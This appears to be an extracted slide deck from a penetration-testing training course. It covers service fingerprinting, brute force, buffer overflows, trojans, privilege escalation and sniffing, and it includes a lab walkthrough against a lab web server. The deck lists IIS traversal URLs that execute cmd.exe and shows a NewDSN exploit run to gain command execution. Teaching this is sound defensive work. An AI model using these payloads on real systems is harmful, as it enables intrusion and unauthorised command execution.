Transcript Document
System Hacking
Section 4
7/21/2015
Outline
•
•
•
•
•
•
Service identification
Vulnerability identification and research
Exploits
Putting it all together
Target selection in large networks
Using automated tools
7/21/2015
Service Identification
Section 4.1
7/21/2015
Service Identification
• Common ports
• Banners
• Fingerprinting
7/21/2015
Connecting to ports
• Telnet or netcat is the best way to connect
to ports
• Many services may be accessed directly
7/21/2015
Common ports
Many services can be identified by their common port numbers
7/21/2015
Zone-h.org
7/21/2015
Alldas.de
7/21/2015
Banners
Some services may be better identified by
banners:
• telnet on routers (2001, 4001, 6001)
• Web daemons for applications
– Compaq Insight Manager
– Many systems include web configuration
interfaces
7/21/2015
Banners
7/21/2015
Fingerprinting
Some services cannot be clearly identified
just by connecting the them:
• Netbus on NT uses the same port as an
RPC service on Solaris
• Some database connections do not provide
automatic response
Fingerprinting a service may identify what it
is, even if it has moved ports
7/21/2015
Fingerprinting
7/21/2015
Vulnerability Research
Section 4.2
7/21/2015
Vulnerability identification and
research
• This is the process of mapping identified security
attributes of a system or application to potential
vulnerabilities
Several methods to map vulnerabilities:
1. Manually map identified systems against publicly
available database such as www.securityfocus.com,
www.cert.org and vendor security alerts
2. Use public exploit code posted to various security
mailing lists, hacker websites or write your own code
3. Use automated vulnerability scanning tools such as
Nessus, ISS or whisker
7/21/2015
Vulnerability research
7/21/2015
Lab
• Explore the following security sites to identify
what vulnerability information would be of use to
you for the services you have identified.
–
–
–
–
–
www.securityfocus.com
General searches on google.com
www.packetstormsecurity.com
www.astalavista.box.sk
www.securiteam.com
Time: 30 minutes
7/21/2015
Exploits
Section 4.3
7/21/2015
Types of exploits
• Remote exploits
• Trojans
• Privilege escalation
7/21/2015
Remote Exploits
Section 4.3.1
7/21/2015
Remote exploits
A ‘remote exploit’ attempts to gain access
across the network and without proper
authentication.
Examples:
• Brute force authentication attempts
• Attacks bypassing integrity checkers
• Buffer overflows
• Sniffing (to some extent)
7/21/2015
Brute force attacks
Most common services attacked
1. Telnet
2. FTP
3. “R” commands
4. Secure Shell
5. SNMP community names
6. Post Office Protocol (POP)
7. HyperText Transport Protocol (HTTP/HTTPS)
8. SMB
7/21/2015
Common Tools used
•
•
•
•
•
•
Brutus
Admsnmp
Admsmb
TeeNet
Pwscan.pl
Thc_hydra
7/21/2015
Remote password guessing
• Attempting to connect to an enumerated
share such as (ADMIN$ and C$) and
trying username/password combinations
until one works
• A “null session” can be established with
the target to obtain valid account names
• Use an automated password guessing tool
to brute force the selected shares.
7/21/2015
Brute force attacks under
Windows
• Some common services prone to bruteforce:
– Web
– Netbios
– FTP
7/21/2015
7/21/2015
Legion
7/21/2015
Brute force attacks under Unix
• Some common services prone to bruteforce:
–
–
–
–
–
telnet
Ssh
Web
FTP
R-commands
7/21/2015
Lab
• Use a Netbios scanning tool to identify
local shares on this network
• Use brute force tool to attempt access to an
account on 10.0.1.120
• Warning! These tools can produce
significant traffic and lock accounts.
Time: 30 minutes
7/21/2015
Buffer overflow attacks
FULL WORKSHOP ON BUFFER
OVERFLOWS AVAILABLE from
LOUD-FAT-BLOKE
•
•
•
•
Stack overflows
Format string overflows
Heap overflows
Overflow subverting the control path
7/21/2015
Buffer overflow attacks
FULL WORKSHOP
ON BUFFER
OVERFLOWS
AVAILABLE from
LOUD-FAT-BLOKE
7/21/2015
Buffer overflow attacks
FULL WORKSHOP ON BUFFER OVERFLOWS
AVAILABLE from
LOUD-FAT-BLOKE
• Occurs when a user or process attempts to place
more data into a buffer than was originally
allocated
• Commonly associated with C functions like
strcpy(), strcat(), sprintf() and etc
• Most frequently found when user input is taken
and passed into an application
7/21/2015
Windows buffer overflows
• Only a few conditions have been revealed to date
• All of them exploited flaws in application programs
• Very common for DoS attacks
Exploits
1. Netmeeting 2.x by Cult of the Dead Cow
2. NT RAS by Cerberus Information Security
3. Winhlp32 by Cerberus Information Security
4. IISHack by eEye
5. Oracle Web Listener 4.0 by CIS
6. Outlook GMT token overrun by Underground Security
Systems Research
7. IIS .printer
7/21/2015
Unix buffer overflows
•
•
•
•
Sadmind
ftp
Ssh
nfs
7/21/2015
Unexpected input
• Bypassing integrity checks
• Gaining access by providing unexpected
input
– IIS unicode
– Web applications
7/21/2015
Format string attacks
• Caused by programming errors in the
formatted output family of functions,
which includes printf() and sprintf()
• Efforts usually focused on SUID root
programs
7/21/2015
Input validation attacks
• Occurs when a program fails to recognise
syntactically incorrect input
• Occurs when a module accepts extraneous
input
• Occurs when a module fails to handle
missing input fields
• A field-value correlation error occurs
• Common in web applications
7/21/2015
IIS vulnerabilities
• Unicode and URL based attacks
• Special tags in HTTP
• Sample scripts to brute force
7/21/2015
IIS hacking
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
/scripts/root.exe?/c+dir
/MSADC/root.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
7/21/2015
Lab
• Use the provided URLs to roam the
filesystem of 10.0.1.120
• What is accessible and what is not?
Time: 10 minutes
7/21/2015
Trojan Horses and Backdoors
Section 4.3.2
7/21/2015
Windows trojans and backdoors
These programs provide unauthorised access
to a system without the user’s knowledge:
• Theef
• CDC BackOrifice
• SubSeven
• Moosucker
A great site: http://www.tlsecurity.net
7/21/2015
Tlsecurity.net
7/21/2015
Privilege Escalation
Section 4.3.3
7/21/2015
Privilege escalation
• Attack used to move from normal user to
superuser
• Quest for Administrator
• Quest for root
7/21/2015
Quest for Administrator
•
•
•
•
Hoovering information
Getadmin
Sechole
Spoofing LPC Port requests
7/21/2015
Hoovering information
• Identify further information that will gain
higher privileges
• Srvinfo
• Find utility
• regdmp
7/21/2015
Getadmin
• Windows NT 4
• Small program written by Konstantin
Sobolev
• Adds users to the local admin group
• Hijacks a process called winlogon
• Patched by NT SP3
7/21/2015
Sechole
• Similar functionality to getadmin
• Modifies instructions in the memory of the
OpenProcess API
• Possible to launch remotely if IIS is
running
• Patched by NT SP6a
7/21/2015
Spoofing LPC Port Requests
• Vulnerability identified by The RAZOR
Team at http://razor.bindview.com
• The code takes advantage of a flaw in one
function of the Local Procedure Call (LPC)
Ports API
7/21/2015
Quest for root
•
•
•
•
•
•
•
•
•
Local buffer overflow
Symlink
File Descriptor attacks
Signal handling
Core-file manipulation
Shared libraries
Kernel flaws
System misconfiguration
IFS attacks
7/21/2015
Local buffer overflow
• Mostly used to exploit SUID root programs
• May add username to password file
7/21/2015
Sniffing
Section 4.3.4
7/21/2015
Sniffing
• Sniffing works by setting a network card to
‘promiscuous mode’
• Sniffing only works on traffic travelling
across the local network
• Sniffing is greatly complicated by network
switchs
7/21/2015
Windows password sniffing
• Can use any ordinary packet analyser
• Or use a specialised tool such as l0phtcrack
• Some susceptible services:
– Netbios
– FTP
– Web (especially cookies)
7/21/2015
Windows password sniffing
7/21/2015
Unix password sniffing
• Can use any ordinary packet analyser
• But Unix has some great sniffers such as dsniff
• Many Unix programs send passwords in clear
text
• Some susceptible services:
– Telnet
– FTP
– Web
7/21/2015
dsniff
•
•
•
•
•
•
•
Netbios
ftp
telnet
R-commands
http
Instant messenging
And much much
more!
7/21/2015
NT services
Section 4.4
7/21/2015
Common NT services
7/21/2015
Profile: Netbios
•
•
•
•
•
Ports 135:139
Susceptible to sniffing, brute force
Scanners available to search for shares
Can give access to system registry
Normally blocked at routers due to
broadcast
7/21/2015
Profile: Web
• Port: 80, or any for special apps
• Common servers: Apache, Oracle, IIS,
Cold Fusion
• Very susceptible to DoS attacks
• Often give read access to all files
• IIS vulnerabilities are legendary
7/21/2015
Profile: SMTP
• Port: 25
• Very susceptible to mail relay
• Not a lot else
7/21/2015
Profile: FTP
• Port:21
• Part of IIS distribution
• Some vulnerabilities but not a large target
7/21/2015
Profile: databases
• Ports: 1433, 1510, 1725
• MSSql is a good internal network target
• MS and Oracle often set with default
passwords
• “SQL injection” a favourite for web
hackers
7/21/2015
Unix services
Section 4.5
7/21/2015
Profile: SNMP
• Port: 160, 161 UDP
• SNMP has two default passwords: public,
private
• Tools such as snmpwalk good for
enumerating entries
7/21/2015
Profile: TFTP
• Port: 69
• Typically used to boot diskless
workstations or network devices such as
routers
• No username or password
• Good for sending around files from hacked
systems
7/21/2015
Profile: FTP
• Ports: 20, 21
• Allows upload and download of files from
a remote system
• Many ftp server allow anonymous access
• May be vulnerable to buffer overflow
• Can also be used for bounce attacks
7/21/2015
Profile: Sendmail
• Port: 25
• Mail transfer agent used on many Unix
systems
• Can be used to identify accounts via the
vrfy and expn commands
• Some version susceptible to denial of
service and buffer overflows
• Long list of vulnerabilities
7/21/2015
Profile: RPC
• Remote Procedure Call
• Allow a program on one computer to
execute code on a remote system
7/21/2015
Profile: Web
•
•
•
•
Port: 80
Apache is most common
Not as many attacks as IIS
Always check URLs for embedded
commands
7/21/2015
Identifying targets in large
networks
Section 4.6
7/21/2015
Target selection
• Scan for specific services
–
–
–
–
Database (MS, Oracle, Sybase)
Web
RPC
R-commands
• View Netbios browse lists to make way to
PDC/server
• View Netbios browse lists to identify treasury, etc
7/21/2015
Automated vulnerability
scanning tools
Section 4.8
7/21/2015
Example automated applications
•
•
•
•
•
•
Grinder
SiteScan
Whisker
Twwscan
Nessus
Elza – scriptable web client
7/21/2015
whisker
7/21/2015
Nessus
7/21/2015
Conclusion
• Hackers often search for specific known
vulnerabilities and avoid well-secured
systems
• Free tools make it simple to gain
unauthorised access to some systems
• Tools such as Nessus should be used by
every security professional
7/21/2015
Putting it all together
Section 4.7
7/21/2015
Our Configuration for today
For the purpose of the presentation, we
will not perform our tests over the internet
But we won’t cheat by cutting out the
firewall
Webserver
Internal=10.0.1.120
TCP 80 only
External=10.0.0.120
Internet
10.0.0.1
Router
Firewall
10.0.0.125 10.0.1.125
7/21/2015
Network Penetration Tests
7/21/2015
Identifying firewall
Strategy
• Identify the Web or Mail server
• Get the Next-Hop before this
–
–
–
–
This will probably be the perimeter router or the firewall
Firewall 1 & NetScreen appear as a hop
PIX does not appear as a hop (flattens the network)
80% chance that it will be NetScreen, PIX or Firewall 1
• To figure out which
–
–
–
–
ICMP ( i.e. Address Mask Request – Response headers)
Use TCP Stack finger printing
Key ports (258, 259 + 263 could be firewall 1)
IPSEC
BUT luckily
these days the tools are pre-written
7/21/2015
Identifying the Firewall Traceroute
[root@wireless root]# traceroute 10.0.0.120
traceroute to 10.0.0.120 (10.0.0.120)
30 hops max, 38 byte packetsUDP being blocked
Need another tool
1
* * *
2
* *
7/21/2015
Identifying the Firewall - LFT
# lft -vv –E -n 10.0.0.120
Looks like we made it.
Everyone responded.
Will finish TWO
TTL
Moving on...
Suggests
Concluding with 2 hops.
something
between
us
LFT trace to 10.0.0.120:80/tcp
**[4.2 BSD bug]next gateway may errantly reply with reused TTLs
A firewall
perhaps
**[4.2 BSD bug]next gateway may errantly reply with reused TTLs
1 [target] 10.0.0.120:80 6.5ms
2 [target] 10.0.0.120:80 1.6ms
Could also use MPTraceroute
7/21/2015
Accessible hosts – sweep for the
firewall
# nmap -sP -n 10.0.0.*
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host
Ourup.
web server
(10.0.0.120) appears to be
Host
(10.0.0.121) appears to be down.
Host
Who’s this
(10.0.0.122) appears to be down.
Host
(10.0.0.123) appears to be down.
Host
(10.0.0.124) appears to be down.
Host
(10.0.0.125) appears to be up.
Host
(10.0.0.255) appears to be down.
Nmap run completed -- 256 IP addresses (2 hosts
up) scanned in 35 seconds
7/21/2015
Identifying the perimeter – Ikescan
# ike-scan -v 10.0.0.125
Starting ike-scan 1.6 with 1 hosts
---
Pass 1 of 3 completed
---
Pass 2 of 3 completed
---
Pass 3 of 3 completed
Ending ike-scan 1.6:
1 hosts scanned in 22.595 seconds (0.04 hosts/sec).
0 returned handshake; 0 returned notify
7/21/2015
Identifying the Firewall conclusion
# ping 10.0.0.120
PING 10.0.0.120
: 56(84) bytes of data.
64 bytes from 10.0.0.120: icmp_seq=1 ttl=128
time=0.280 ms
--- 10.0.0.120 ping statistics --2 packets transmitted, 2 received, 0% loss
Windows !!
# ping -v -R 10.0.0.120
PING 10.0.0.120 : 56(124) bytes of data.
--- 10.0.0.120 ping statistics ---
With low level
Packet
inspection
6 packets transmitted, 0 received,100%
loss
I think not!!
7/21/2015
Identifying the Firewall – Icmp
processing
# ping -v -T tsandaddr 10.0.0.120
PING 10.0.0.120 (10.0.0.120) from 10.0.0.1 : 56(124)
bytes of data.
--- 10.0.0.120 ping statistics --16 packets transmitted, 0 received, 100% loss
# ping -v -T tsandaddr 10.0.0.125
PING 10.0.0.125 (10.0.0.125) from 10.0.0.1 : 56(124)
bytes of data.
--- 10.0.0.125 ping statistics --8 packets transmitted, 0 received, 100% loss
7/21/2015
Identifying the Firewall Conclusion
• We suspect there is a firewall
– We know the web server is windows
– But windows is not normally capable of
manipulating packets to this extent
– We are fairly sure that it isn’t firewall 1
Lets see if we can hack into the servers
7/21/2015
Hacking the other address 10.0.0.125
7/21/2015
Scanning 10.0.0.125
# nmap -sS -n -p 1-10000
10.0.0.125
Starting nmap 3.48 ( http://www.insecure.org/nmap/ )
All 10000 scanned ports on 10.0.0.125 are: filtered
Nmap run completed -- 1 IP address (1 host up)
Nothing to hack
# nmap -sU -n -p 1-10000
10.0.0.125
Starting nmap 3.48 ( http://www.insecure.org/nmap/ )
All 10000 scanned ports on 10.0.0.125 are: filtered
Nmap run completed -- 1 IP address (1 host up)
7/21/2015
Hacking the web server
7/21/2015
Hacking the web server
– Scan TCP ports
– Scan UDP ports
!!! Only HTTP or HTTPS ports should be visible
– Run CGI scanner (I.e. Whisker, Crazymad or Nikto) to
look for web server exploits
– Check Scanner
– Identify exploits
7/21/2015
Hacking the web server
Scan UDP ports
#
# nmap -sU -n -p 1-10000
10.0.0.120
Nothing to hack
Starting nmap 3.48
All 10000 scanned ports on 10.0.0.120 are:
filtered
Nmap run completed -- 1 IP address (1 host
up) scanned in 623.296 seconds
#
#
#
7/21/2015
Hacking the web server
Scan TCP ports
#
nmap -sS -n -O -p 1-1024 10.0.0.120
HTTP - The only
Interesting ports on 10.0.0.120:
Port to hack
(The 1023 ports scanned but are
filtered)
PORT
STATE SERVICE
80/tcp open http
Now we know
Running (JUST GUESSING) : Cisco pix os 6.X
(88%)
Aggressive OS guesses: Cisco PIX 501 running
6.x
No exact OS
matches for host.
7/21/2015
Hacking the web server
Run CGI scanner
# ./whisker.pl -h 10.0.0.120
-- whisker / v1.4.0 / rain forest puppy –
= Host: 10.0.0.120
= Server: Microsoft-IIS/4.0
+ 200 OK (IDC error): GET
/scripts/samples/details.idc
+ 200 OK (IDC error): GET
/scripts/samples/ctguestb.idc
+ 200 OK: HEAD /scripts/tools/newdsn.exe
- this can be used to make DSNs, useful in
use with our ODBC exploit
- and the RDS exploit (with msadcs.dll)
[root@wireless
v1.4]# exit
7/21/2015
Hacking the web server
Analysing CGI scanner results
7/21/2015
Hacking the web server
Analysing CGI scanner results
7/21/2015
Hacking the web server
Analysing CGI scanner results
7/21/2015
Run exploit identified by scanner
# dsnhackII.pl
-c
-h 10.0.0.120
NewDSN exploit v 1.3 -- Scrippie / Phreak.nl
* [Checking for necessary files] *
Checking for: newdsn.exe
-- Found :)
Checking for: ctguestb.idc
-- Found :)
Checking for: details.idc
-- Found :)
* Now trying to create "Web SQL" DSN... <success> *
Initializing GuestBook by GETting ctguestb.idc
Type the command line you want to run (cmd /c assumed):
cmd /c dir >> ..\hamster
* Now trying to execute command... <success> *
[root@wireless root]#
7/21/2015
Lab
• Attack the systems provided and attempt to
get command line access to NT
Time: 45 minutes
7/21/2015